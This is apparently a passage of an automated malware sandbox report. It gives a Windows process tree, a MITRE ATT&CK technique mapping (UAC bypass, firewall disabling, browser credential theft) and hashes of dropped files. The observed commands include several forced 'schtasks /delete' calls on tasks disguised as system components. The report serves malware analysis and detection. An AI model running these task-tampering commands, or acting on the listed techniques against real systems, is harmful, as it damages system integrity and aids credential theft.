C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4488
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "SystemUpdates" /f1⤵
- Process spawned unexpected child process
PID:3892
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "SystemUpdatesS" /f1⤵
- Process spawned unexpected child process
PID:3620
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "sysmon" /f1⤵
- Process spawned unexpected child process
PID:3800
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "sysmons" /f1⤵
- Process spawned unexpected child process
PID:2904
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dllhost" /f1⤵
- Process spawned unexpected child process
PID:3408
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dllhostd" /f1⤵
- Process spawned unexpected child process
PID:3032
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dwm" /f1⤵
- Process spawned unexpected child process
PID:964
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dwmd" /f1⤵
- Process spawned unexpected child process
PID:712
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dwm" /f1⤵
- Process spawned unexpected child process
PID:236
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dwmd" /f1⤵
- Process spawned unexpected child process
PID:2988
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious use of FindShellTrayWindow
PID:2820 -
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2804
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1032
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1392
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
7Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
132B
MD558e74fa818e8cce8e80ecc9f8cbcc8a1
SHA158abd252b2c7b3c234cd96582a40802c0b51788d
SHA256e53b0946ac004e41be07cc97c4b74983c0667eeb3b89aa5527fbda4d44c0b3d1
SHA5129c42c26126f4ada357719cf84a65eefbaa5873a86e19a8c424191cc289c6e130c28bc6df467cd71bf95dd2343425e272d6c9aee7b84b98181a46594763972688
-
Filesize
543B
MD5edaed1f15b355d1b50911e6d6b199b42
SHA102462609bf5fd94a96c7dc0d091452368f3e7f04
SHA256edf4f199b51b187222a11a143c024ee3998c400701a996dddf38ec58797c8acc
SHA5124ce6811952bf1a02d5128a0804135b469528e6dd3cde63b65f0492439f7ce1a3d9117a56355b70a0d7910705d01d0e3f7f71b1e6c71a38ee07cec0b4c6c321d1
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
150B
MD5b3f2fca43760ecfa68917ee4110865c1
SHA16169d73829d4bc888cecf8b06fe69448b5df4248
SHA256f4ed8df53b8da23cd20866bf55091ac35c644b5bf4658014ea580a23fd6edada
SHA512ae247c75cd004bf65b7c5a596bbd95b7c5c356b60b79a5459b47e0f22a7a10670dce631066dd8633e0493296801398d1d9017d600d8750e2ffc7a9942f25ab55
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3719a391-eb94-4fb1-bb2f-1d363930f98c.dmp
Filesize3.5MB
MD51321b068780c65c700dacb690f64b7b7
SHA1f31baf7d77520f0807076c5709333888b2ae6f6e
SHA25613a3deeb3c597ad6a69d8b5eb27d7560ae33411285623a6b38975ecd03af8f7e
SHA5127076331cc3952570a90c6ffd9967ecbc56bc94e26caa77520a717bf54a9665501b39a2a109873e7f81fc7ca2ef024099a9d290fa32af7e29abeb0792d3505960
-
Filesize
152B
MD502a4b762e84a74f9ee8a7d8ddd34fedb
SHA14a870e3bd7fd56235062789d780610f95e3b8785
SHA256366e497233268d7cdf699242e4b2c7ecc1999d0a84e12744f5af2b638e9d86da
SHA51219028c45f2e05a0cb32865a2554513c1536bf9da63512ff4e964c94a3e171f373493c7787d2d2a6df8012648bbefab63a9de924f119c50c39c727cf81bdc659f
-
Filesize
152B
MD5826c7cac03e3ae47bfe2a7e50281605e
SHA1100fbea3e078edec43db48c3312fbbf83f11fca0
SHA256239b1d7cc6f76e1d1832b0587664f114f38a21539cb8548e25626ed5053ea2ab
SHA512a82f3c817a6460fd8907a4ac6ab37c2129fb5466707edcfb565c255680d7f7212a5669fe2a42976150f16e4e549ea8310078f22ed35514ee1b7b45b46d8cc96e
-
Filesize
152B
MD5f029fd80ed7e0562543d6c6f18773551
SHA10da9349739a50cf72bbd5dcaab59449da631d011
SHA2565e260ce3bb8162ed5e9658a6ff5c25145cffcb7bf0f26362e84529a43b73af87
SHA512eb3d5b381fbae23f7e6619110d874396e97cf5c0ad022180444cf621d737c5f5bd312709db18f23e924021d7dbd8ccb1f13c02a885443f8f6d554397de4fb52e
-
Filesize
5KB
MD592a2bfa904f8bb8efee185182656ebcb
SHA1d2d850d2a2b8afac5010da65438a66cd1e0ad15b
SHA25656709bdc038dbc65d3a7fa4b746f30b85d35e6b3c4c1e17183c115d337380ce9
SHA5122b83ab5e9665ee372bb769b8b88785035a615b508cdb40bbce982fc547c6c4fff1da214b923511e3257830917c1728031a2d94254d6033919717c8fc69277c92
-
Filesize
5KB
MD5ab062f9ef9a9c0919d4c349324734a46
SHA1a705bb97970bf6174e3d5e4d0636dda714c1e5a9
SHA256439281d5c9561777324265134aa59398e72765229edf6f1981ccb65fe555fed0
SHA5128c71624c490ad25ad385cd250ed3fe5902aeacb5ab7f68cbd8414ce7e24ec75f6b0a778c6733339613ab297a3710053daad89ec752de57ececffe8982c2f09b8
-
Filesize
5KB
MD54cf35e1034411f9c5e22074da7ea1547
SHA1ae12d645e4ccdef5f1eca5ecce7bcb21a15b5022
SHA256f2134f3be4bc8ea3181dd68088a83978d9e7ad04dc372ef8f0176cf84349e8ee
SHA5122f351e85324c4e31dfde1e0aabd11afb71d3c064f4a5e6974dd996ca64ab156e7db33cdb13c764f96fcf68d725a72be50195f8c5236734f6ece5bccfd30ce7f8
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD503bda1dea7b909971e65f2ce9b899f16
SHA14498582a16e881869783846e172fc6403296433a
SHA2562bc7815289d7babbde35a0beef6693216b35d57c047e2ce63f3b7b179a4ed3de
SHA5120e9a3ae471174b020ea22d1663db472eab07d71a402a855df3907adb3d48f40fdb84c57cf05730838e6c8adddbc4c1dce81e1d085969cc2695686a841038e218
-
Filesize
11KB
MD50d356119e675ea686f9931b0b0f5aea7
SHA13ddd96102e547d8913bfa6817bbb2d8157e64cfe
SHA256e5f9bd44a70ce160c963301db400ec62209840a2b83288772eb8762bc897a642
SHA5126f7b8ac5b649157d8292261ecc0ab674d09544f99af1f0e0cc534d99c39ba7a5d193d359672a6748719200924b5749dfbe0e9b5b1db4adf664e0c5669648bb44
-
Filesize
264KB
MD58aeda5572fe1b28118a339a06fee04ea
SHA19a99bf5f327234f2a6056814464324d9e80344c3
SHA256ef1b305f51fcd459d889fd23909c4ff8cb4a57a735ef20e68d1c415fb3b62894
SHA512fefcef58121ed4428e55b6fd2514b2eae9206293ad7d9dd518e88fe7edee5359789593b1c880fa876a63a994f10712bfe786abdca06cb8c2d9613eb971cecafc
-
Filesize
944B
MD56903d57eed54e89b68ebb957928d1b99
SHA1fade011fbf2e4bc044d41e380cf70bd6a9f73212
SHA25636cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52
SHA512c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e
-
Filesize
944B
MD5dc4dd6766dd68388d8733f1b729f87e9
SHA17b883d87afec5be3eff2088409cd1f57f877c756
SHA2563407d8ad0c68a148aef81c7f124849573ac02097acd15f9bbe80f86e0498e826
SHA5123084c1b7bb0fd998cddb8c917bac87f163a0f134a420158db4f354cb81ec1d5d65d3bac1d9b3e11b0a6707deacece47f819b1ed55ddf2b1d287fbdb244bf65a4
-
Filesize
944B
MD57d760ca2472bcb9fe9310090d91318ce
SHA1cb316b8560b38ea16a17626e685d5a501cd31c4a
SHA2565c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4
SHA512141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35
-
Filesize
944B
MD5408641808e457ab6e23d62e59b767753
SHA14205cfa0dfdfee6be08e8c0041d951dcec1d3946
SHA2563921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258
SHA512e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\VV0OCZTA\www.bing[1].xml
Filesize328B
MD5205fe816d12a65d4348f574dc10e2bbc
SHA1c6cf9c9995cdd32a7bd60627ee7a913e05850b86
SHA2569cc1a77926fe1a8fe7cd3476b4f24f894e06420ce847f1bfceb86333cf599d4e
SHA5128d34bbf27c61965ee36d3e1db5ed0ad97adaf3ef271e93efb1c068f578f1ed8cb9908061461ee4d53281d701d865b13417e7bc9b23d1a85497fbeb3522b9b271
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\VV0OCZTA\www.bing[1].xml
Filesize15KB
MD5be044f10e61f86e32812f5b990ce1134
SHA1f22914fe19ad3ac62155e132e0a3628250e8b0bf
SHA256722eec55f610a6602ed617a9bf1cc7055fcc355c662911ad04a8e8301d3fbbee
SHA512122a6f946cb8d925bf5142fa3d7831a1713f596b92602648279f0040b7023eb969cc0cbd86da14f5175f8014d489fc624309379eb7faf3923fb8e969a726219c
-
Filesize
93KB
MD5358b0c4e6149fa783c37d963a0630047
SHA1ce7ef081d4e782b22ecf15ca096d90561403bc60
SHA256a530485ad896b0192ea934f8ac93279ed1c73320779b6a448ac8e5862e9faf0c
SHA51237f6d2187b68cb2d2db5e8385e369e5ec0bb461164646df77b44b07fb9471de507dfe1350083084bd848ea15063ec285a2545c3adabc7851249db22b27cde560
-
Filesize
1.9MB
MD5e659b7e15ff77b76ae1ca12de1b83419
SHA1d0fae57f6cb00bea8292eb160d9940a441aa7f7e
SHA256f70bf625085dfece9e5ea39f44319e36deec706dcebc0ca95fc0483d79ddf6ad
SHA512c65d52d4f59c68cb51e84c5dd00fc2772956d55fa5f43d518d75d3e36fb8e57bf0ef74ec5bd0a0e205fa52d99202a1faa2f9bec0ad6c7f7c1e654f0f945895d2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
489B
MD5cc852a292718203e6cb671cb75f5f4ea
SHA107eb3536ec0833a5a4e7f1505a22c36b838cc4d2
SHA256f6d031adb82bf3cc90bca4c8147a0ccd0cb6a121fa2f2952012d7c4e4efd7713
SHA512bda1d86b1216986f6b84fefc4b501b1f1e088cee425e49dd12627f87d4f6d489bbc53e00468a5d847b9f98b14f44260b0e179ced9a2d7f6285e347f096f2bf4d
-
Filesize
713B
MD529848c15fddc614e4846279a61919765
SHA12156b54b8a37906da66419b080318d095e3f3503
SHA25684a2bbad38b675c4bf06696c7f0ce7e7c68bd529984f141d124a51aac7cb5cb1
SHA51250dd34d9d93ef2427bb69ca7df664870d80b2376d139a76b1ce8a9c2058be779a794782efead99ecb2b70e00b42ab47cc4159764af6e4edd13b89c9ed557203f
-
Filesize
267B
MD5a481dec15f01a60497bcd18e0ba26788
SHA1a032069f65fe8077c690a4237b71e918be779730
SHA256c76cb4c6b83cdce275244eaf01fc01a2d3b6f7486830cba37965dafe2b432c89
SHA512768cd03539f2a85426910eadbc66b98180370f982013087c74fe4e0840244e508d841dbc0c33ca1fb37f3a62761633ff69845143f13c9ad07aff669e49305105
-
Filesize
164B
MD569df9d1cf82f91bec9a60fa60bad6896
SHA12427acb1541949045762ccf94eb302180badd278
SHA256bc5b89888805e1fb14c422eebcd0161b7f9806a86d3b65bb1032eb34fed95e64
SHA512716fc1724dc834eb3419af16cfb3ea7659899b0c01b6792558aad1c1333da3ad251c55e65bf0252aba75209a9f99d0bec8ed09b7cddcd74ff4bc38b9ed500737
-
Filesize
151B
MD51a0f2f949a4c977ca148b7e1184e2e2b
SHA1d78e290750d6853e40ef64db981ec4e5bba28766
SHA25652c9d9f06608d68d470d89950315033cb377efba6a64e2fb4498d52648225e25
SHA51263f672ea105fb80655eae026f87d9944870c264eeaa6e9a5479e7dfbe76d91e4e7f0125b56349cbbdad032503936eb2598287aac74af725b0c811a35b582c2c9
-
Filesize
223B
MD56612f9c7e9436f5d51e7df6f409985f7
SHA1dea060fb3044be174fb983960ab43eaeeba35ef3
SHA2564a0840ee7da759b66e13978fcc0beddcc85e40fc2cd83e919c9850017031f390
SHA512648561fb34133feb0d14be666111ce53a472e35ed37080a68c4f7eba37c0a4f501229ffbf6ea97970f005cda34741fa290e4494c573b1a3c1e4b2a250e551b93
-
Filesize
1.5MB
MD5e75407ce1b2b4c1ba30e962aba6ba641
SHA1fec41afd8f8a3734e771c9b161dd872fba6e1377
SHA256f6bb9ad12d8ea272e48d60a9be80abc44643b16e0934f490ebcb92c1f41bbdf7
SHA5125bab00725900278d5952ccf2e5e95c454a2004a272c186b2f3707ce703a55c9fff846c72f0d04dcf898a0fb31d0cb3f9ea32e0ffb12c689113e899902e61b596